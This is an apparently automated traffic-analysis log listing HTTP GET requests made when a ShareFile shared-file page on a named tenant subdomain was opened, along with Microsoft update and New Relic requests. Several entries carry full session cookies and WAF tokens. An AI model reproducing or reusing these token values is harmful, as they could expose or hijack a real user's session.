Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-projects-pilet/2.1.15/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-review-approval-pilet/0.27.6/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://averellharriman.sharefile.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-view-engine-pilet/1.24.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-task-aggregator-pilet/1.0.23/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-storage-plugin-pilet/1.2.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-dynamic-forms-pilet/1.39.0/package/dist/index.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /clientwebservice/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: fe3cr.delivery.mp.microsoft.com
Source: global trafficHTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/citrite-citrix-ui.js HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-remediation-pilet/1.3.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-user-actions-pilet/1.15.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sharefile-web/sharefiledev-threatalert-mgt-pilet/1.14.0/package/dist/main.css HTTP/1.1Host: piletfeed-cdn.sharefile.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/50838dcfa76323d03647.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa
Source: global trafficHTTP traffic detected: GET /bundles/c3b78c86faf44765071f.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa
Source: global trafficHTTP traffic detected: GET /bundles/e0aa737e437fa075dfed.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AWSALBTG=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALBTGCORS=6elzZn103QdBMYziEO5dwaWqMb7lzMQjIHZRM0bsv/B2m7PdN1PUOaxAS8gdKseXGuJ2KdTouV8ozbxwhWacTgsBdlX1VlrztaqtyQhyEjV5u5LgCuBZ6EAH3ZIUURXgydHrYagjkVKGtd+fu2zGg1Z9XTI7G28eUVw1zKUYxa0E; AWSALB=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; AWSALBCORS=JG9VdxmkTZWxDhQxaYxCs/07sEdyENM3VQmr/zS8kCKUB+LlcyWbdv9+KtlRluuUhkBBsVAgnw7DIBjcyvxNhK7bXev74YsVspCMn7NCte8wHzbTautSCSfHv+em; aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa
Source: global trafficHTTP traffic detected: GET /nr-spa-1216.min.js HTTP/1.1Host: js-agent.newrelic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bundles/c3b78c86faf44765071f.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALBTGCORS=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALB=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm; AWSALBCORS=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm
Source: global trafficHTTP traffic detected: GET /bundles/50838dcfa76323d03647.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALBTGCORS=b9NdwQulFooUJhjtF0VsmbBINM+tpHXToKqMGST3h236PGKN6pSOy5gyza3P51YzqlY3O0qvnRjhP4wPqGXc3vWwrwqk6N0w0S2Vrs+9Iq9bRJV6m//Z+ipzHrO49/Ii42K/SEGlrsjY8+D2rivy9Ajbo5ZilY3QU8E3cCEP4mtQ; AWSALB=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm; AWSALBCORS=2e/GWqMH4HpQglsaX6MbrKdlsWRVN5vcxPrXAX3WjwbTD9Ta2F3zi6ymCb8REc5cLuFv23bnZZR//ymJOa3evZedGeOMrUfYMtdq5f5MVcVZpWDlPTflkMp9C5Jm
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=z4zFrrzf2way3o4&MD=RMe6SWZc HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /bundles/e0aa737e437fa075dfed.js HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALBTGCORS=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALB=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM; AWSALBCORS=QhHeoWsQYPicCcN/s3qNcaDnpcsoQR+FQN37DB5tY3NnMmjPqlV+MtvLsxv7vnXVkxWLeY6xxmTRJJW8FWTYYbIgeqrSpKAUSAyJtcCJ72+6Ba5oVzpitSdCSZqM
Source: global trafficHTTP traffic detected: GET /favicon-32x32.png HTTP/1.1Host: averellharriman.sharefile.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://averellharriman.sharefile.com/share/view/s3b96c17360cd43e7bdcaf25a23709fd0Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: aws-waf-token=12bf9751-a126-42d5-b058-d35b3aa4244a:EQoAaZmJtjsOAAAA:xkRlisV0689T1jmvmwxmHz1sL5bM9WuSH+rXjwIhYR6qWw8NOhKgLCAPwLqt3fSbjbgzgiuAzKyX+7tSjbgWy24fIVvWGKKVog/+rLdDfPIayaMdLeaL6NEQuqyWfw/X+DnrbYz2hDGC1qgD5K5iPzaEZItkrAqmwwXiRdNnu7sXB9o3SJvUp3LqL1wYSgbzBvTAdqCN7z9gMzoyf8kueXXkIR64a3F4jv5RXcYMHWZnKKDQIuWzdON6LYN/BO2IFkI/BfWa; AWSALBTG=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; AWSALBTGCORS=oyp5HLKX9rhhE08J573Rs4vyyxSd3s+6GEBm1AT2hkqHo7gHAI1FNl1/EY7zI+je7SEb+x3n22mfN+0JaDd+V9b0e9HRUWHtdXkjKOCoGddzTyaYExvN4gAU6Hjt/nagyDNNCE1E5JQbSS3/kHdVknI9PSu5bEGRLTA8cwZV8a0s; 